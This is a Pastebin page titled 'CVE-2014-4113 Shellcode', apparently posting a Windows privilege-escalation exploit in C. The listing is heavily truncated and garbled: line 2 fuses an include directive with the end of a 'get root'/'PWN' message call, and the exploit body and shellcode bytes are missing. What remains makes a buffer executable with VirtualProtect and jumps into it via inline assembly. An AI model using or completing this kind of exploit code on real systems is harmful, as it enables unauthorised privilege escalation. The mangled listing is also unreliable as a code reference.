Advertisement
crazykid_ceh

CVE-2014-4113 Shellcode

Oct 28th, 2014
249
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 17.64 KB | None | 0 0
  1. #include <Windows.h>
  2. #include <stdio.h>"!!!get root!!!","PWN",0);
  3.         if (VirtualProtect((LPVOID)ShellCode,ShellCodeSize,0x40,&dwMemProtect))
  4.         {
  5.                 __asm
  6.                 {
  7.                         lea eax,ShellCode
  8.                         jmp eax
  9.                 }
  10.         }
  11. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement